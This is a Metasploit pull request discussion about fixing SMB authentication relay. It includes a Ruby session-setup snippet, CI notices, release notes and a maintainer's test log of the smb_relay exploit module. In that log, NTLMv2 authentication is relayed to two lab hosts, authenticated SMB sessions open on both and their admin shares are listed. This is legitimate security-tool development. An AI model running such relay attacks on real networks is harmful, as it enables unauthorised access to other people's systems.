# @param [Metasploit::Framework::LoginScanner::Result] result
# @return [Msf::Sessions::SMB]
def session_setup(result)
  # Only the presence of a connection and a proof (the authenticated RubySMB
  # client) is checked; which host actually accepted the credentials is not.
  return unless (result.connection && result.proof)

  my_session = Msf::Sessions::SMB.new(result.connection, { client: result.proof })
  merge_me = {
    'USERPASS_FILE' => nil,
    'USER_FILE' => nil,
    'PASS_FILE' => nil,
    'USERNAME' => result.credential.public,
    'PASSWORD' => result.credential.private
  }
  start_session(self, nil, merge_me, false, my_session.rstream, my_session)
end

I think this would require some extra verification that it might not be worth subjecting every SMB session to for this edge case - although let me know what you think!

@jenkins-eks-metasploit

Additional test pipeline started ⌛
Note: build results only accessible to maintainers.

@cdelafuente-r7
Contributor

Thank you for the last updates. I agree, it is not worth updating the original code for this. Everything looks good to me. I tested with two relay targets and successfully got two sessions using another instance of msfconsole running the smb_login module. This works with both SMB and PSEXEC sessions.

msf exploit(windows/smb/smb_relay) >
[*] New request from 192.168.220.129
I, [2026-03-24T14:19:51.823599 #55100]  INFO -- : Starting thread for connection from 192.168.220.129
I, [2026-03-24T14:19:51.839340 #55100]  INFO -- : Negotiated dialect: SMB v2.0.2
D, [2026-03-24T14:19:51.843592 #55100] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: nil)
D, [2026-03-24T14:19:51.858141 #55100] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4271529741, user_id: nil, state: :in_progress>)
I, [2026-03-24T14:19:51.858491 #55100]  INFO -- : NTLM authentication request overridden to succeed for .\smbuser
D, [2026-03-24T14:19:51.862891 #55100] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4271529741, user_id: ".\\smbuser", state: :valid>)
[*] Received request for .\smbuser
[*] Relaying to next target smb://192.168.5.10:445
D, [2026-03-24T14:19:52.102007 #55100] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4271529741, user_id: ".\\smbuser", state: :in_progress>)
I, [2026-03-24T14:19:52.131849 #55100]  INFO -- : Relaying NTLM type 1 message to smb://192.168.5.10:445 (Always Sign: true, Sign: true, Seal: true)
D, [2026-03-24T14:19:52.165396 #55100] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4271529741, user_id: ".\\smbuser", state: :in_progress>)
I, [2026-03-24T14:19:52.166219 #55100]  INFO -- : Relaying NTLMv2 type 3 message to smb://192.168.5.10:445 as .\smbuser
[+] Identity: .\smbuser - Successfully authenticated against relay target smb://192.168.5.10:445
[*] Skipping previously captured hash for .\smbuser
[*] SMB session 1 opened (192.168.5.40:59081 -> 192.168.5.10:445) at 2026-03-24 14:19:52 +0100
D, [2026-03-24T14:19:52.531666 #55100] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4271529741, user_id: ".\\smbuser", state: :valid>)
[*] Received request for .\smbuser
[*] Relaying to next target smb://192.168.220.134:445
D, [2026-03-24T14:19:52.543412 #55100] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4271529741, user_id: ".\\smbuser", state: :in_progress>)
I, [2026-03-24T14:19:52.544122 #55100]  INFO -- : Relaying NTLM type 1 message to smb://192.168.220.134:445 (Always Sign: true, Sign: true, Seal: true)
D, [2026-03-24T14:19:52.567340 #55100] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4271529741, user_id: ".\\smbuser", state: :in_progress>)
I, [2026-03-24T14:19:52.567859 #55100]  INFO -- : Relaying NTLMv2 type 3 message to smb://192.168.220.134:445 as .\smbuser
[+] Identity: .\smbuser - Successfully authenticated against relay target smb://192.168.220.134:445
[*] Skipping previously captured hash for .\smbuser
[*] SMB session 2 opened (192.168.220.1:59083 -> 192.168.220.134:445) at 2026-03-24 14:19:52 +0100
D, [2026-03-24T14:19:52.867848 #55100] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4271529741, user_id: ".\\smbuser", state: :valid>)
[*] Received request for .\smbuser
[*] Identity: .\smbuser - All targets relayed to
W, [2026-03-24T14:19:52.869012 #55100]  WARN -- : Received TREE_CONNECT request for non-existent share: admin$
D, [2026-03-24T14:19:52.884060 #55100] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4271529741, user_id: ".\\smbuser", state: :valid>)
[*] Received request for .\smbuser
[*] Identity: .\smbuser - All targets relayed to
D, [2026-03-24T14:19:52.884943 #55100] DEBUG -- : Received TREE_CONNECT request for share: IPC$
D, [2026-03-24T14:19:52.896604 #55100] DEBUG -- : Dispatching request to do_logoff_smb2 (session: #<Session id: 4271529741, user_id: ".\\smbuser", state: :valid>)
I, [2026-03-24T14:19:52.902941 #55100]  INFO -- : Ending thread for connection from 192.168.220.129

msf exploit(windows/smb/smb_relay) > sessions

Active sessions
===============

  Id  Name  Type         Information                 Connection
  --  ----  ----         -----------                 ----------
  1         smb windows  SMB  @ 192.168.5.10:445     192.168.5.40:59081 -> 192.168.5.10:445 (192.168.5.10)
  2         smb windows  SMB  @ 192.168.220.134:445  192.168.220.1:59083 -> 192.168.220.134:445 (192.168.5.10)

msf exploit(windows/smb/smb_relay) > sessions -i 1
[*] Starting interaction with 1...

SMB (192.168.5.10) > shares
Shares
======

    #  Name    Type          comment
    -  ----    ----          -------
    0  ADMIN$  DISK|SPECIAL  Remote Admin
    1  C$      DISK|SPECIAL  Default share
    2  IPC$    IPC|SPECIAL   Remote IPC
    3  share   DISK

SMB (192.168.5.10) > exit
[*] Shutting down session: 1

[*] 192.168.5.10 - SMB session 1 closed.  Reason: User exit
msf exploit(windows/smb/smb_relay) > sessions -i 2
[*] Starting interaction with 2...

SMB (192.168.220.134) > shares
Shares
======

    #  Name    Type          comment
    -  ----    ----          -------
    0  ADMIN$  DISK|SPECIAL  Remote Admin
    1  C$      DISK|SPECIAL  Default share
    2  IPC$    IPC|SPECIAL   Remote IPC
    3  share   DISK

SMB (192.168.220.134) > exit
[*] Shutting down session: 2

@jenkins-eks-metasploit

Additional test pipeline started ⌛
Note: build results only accessible to maintainers.

@jenkins-eks-metasploit

Pipeline results available

Slice summary:

  • Test slice 1 - 🟢
  • Test slice 2 - 🟢
  • Test slice 3 - 🟢
  • Test slice 4 - 🟢

Note: build results only accessible to maintainers.

@jenkins-eks-metasploit

Pipeline results available

Slice summary:

  • Test slice 1 - 🟢
  • Test slice 2 - 🟢
  • Test slice 3 - 🟢
  • Test slice 4 - 🟢

Note: build results only accessible to maintainers.

@github-project-automation github-project-automation Bot moved this from Waiting on Contributor to In Progress in Metasploit Kanban Mar 24, 2026
@cdelafuente-r7 cdelafuente-r7 added the rn-fix release notes fix label Mar 24, 2026
@cdelafuente-r7 cdelafuente-r7 merged commit bf1a123 into rapid7:master Mar 24, 2026
60 of 63 checks passed
@github-project-automation github-project-automation Bot moved this from In Progress to Done in Metasploit Kanban Mar 24, 2026
@cdelafuente-r7
Contributor

Release Notes

This fixes an issue that prevented successful authentication relay from the Ruby SMB Client and smbclient. These clients are now compatible with Msf::Exploit::Remote::SMB::RelayServer.
